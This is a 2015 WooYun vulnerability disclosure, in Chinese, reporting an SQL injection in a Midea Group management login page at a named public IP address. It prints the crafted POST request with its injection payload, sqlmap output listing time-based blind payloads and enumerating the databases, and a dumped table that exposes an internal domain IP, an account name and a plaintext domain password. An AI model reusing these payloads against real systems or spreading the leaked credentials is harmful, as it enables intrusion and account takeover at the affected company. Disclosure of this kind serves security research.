当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0105376

漏洞标题:美的集团某服务存在漏洞泄露内部域信息

相关厂商:美的集团

漏洞作者: xterm

提交时间:2015-04-02 15:42

修复时间:2015-05-17 15:44

公开时间:2015-05-17 15:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

美的集团某服务存在漏洞泄露域信息

详细说明:

POST /manager/login.php?action=login HTTP/1.1
Content-Length: 105
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://202.104.30.186:80/
Cookie: PHPSESSID=g0mcm46780qfs2ac6cdeou0rl6
Host: 202.104.30.186
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
admin%5bname%5d=-1'%20OR%203*2*1%3d6%20AND%20000129%3d000129%20--%20&admin%5bpassword%5d=g00dPa%24%24w0rD


漏洞证明:

[*] starting at 00:57:18
[00:57:18] [INFO] parsing HTTP request from '1'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] y
[00:57:22] [INFO] resuming back-end DBMS 'mysql' 
[00:57:22] [INFO] testing connection to the target URL
[00:57:22] [INFO] heuristics detected web page charset 'utf-8'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #2*
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: admin[name]=-1' OR 32 AND SLEEP(5)-- ZOyO1=6 AND 000129=000129 -- &admin[password]=g00dPa$$w0rD
Place: (custom) POST
Parameter: #1*
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: admin[name]=-1' OR 3 AND SLEEP(5)-- KyjK21=6 AND 000129=000129 -- &admin[password]=g00dPa$$w0rD
---
there were multiple injection points, please select the one to use for following injections:
[0] place: (custom) POST, parameter: #1*, type: Unescaped numeric (default)
[1] place: (custom) POST, parameter: #2*, type: Unescaped numeric
[q] Quit
> 1
[00:57:25] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: MySQL 5.0.11
[00:57:25] [INFO] fetching database names
[00:57:25] [INFO] fetching number of databases
[00:57:25] [WARNING] time-based comparison requires larger statistical model, please wait..............................                                                                                           
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[00:57:38] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
4
[00:57:39] [INFO] retrieved: 
[00:57:49] [INFO] adjusting time delay to 1 second due to good response times
information_schema
[00:59:24] [INFO] retrieved: mysql
[00:59:53] [INFO] retrieved: per
[01:00:16] [ERROR] invalid character detected. retrying..
[01:00:16] [WARNING] increasing time delay to 2 seconds 
formance_schema
[01:02:30] [INFO] retrieved: unnoo
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] unnoo


域信息泄露

+----+------------------------+----------------+-----------+--------------+--------------+-------------+-----------------+-------------------+
| id | path                   | log_ip         | user_deep | domain_ip    | domain_name  | create_type | domain_password | domain_admin_name |
+----+------------------------+----------------+-----------+--------------+--------------+-------------+-----------------+-------------------+
| 9  | \\\\172.16.15.130\\123 | 202.104.30.186 | 2         | 10.16.15.240 | midea.com.cn | 2           | zv7LW4          | mxpt_bind         |
+----+------------------------+----------------+-----------+--------------+--------------+-------------+-----------------+-------------------+


修复方案:

版权声明:转载请注明来源 xterm@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)